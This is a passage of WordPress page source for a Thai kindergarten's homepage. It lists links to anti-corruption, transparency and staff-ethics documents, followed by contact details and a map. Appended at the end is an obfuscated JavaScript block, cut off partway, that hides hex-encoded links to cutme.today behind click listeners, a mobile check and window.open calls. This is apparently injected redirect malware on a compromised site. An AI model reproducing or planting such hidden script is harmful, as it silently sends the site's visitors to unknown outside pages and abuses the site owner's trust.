900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1YhuyYvmrvtvgv6jkYfYHMulIorbiuLIA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1Nf4XWZmTyc4NdsmEJfShsVdo2WXGwzgr/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ป</a><a href=\"http://watprato.ssk.in.th/?page_id=2\" data-type=\"page\" data-id=\"2\">ระกาศเจตนารมณ์นโยบาย No G</a><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\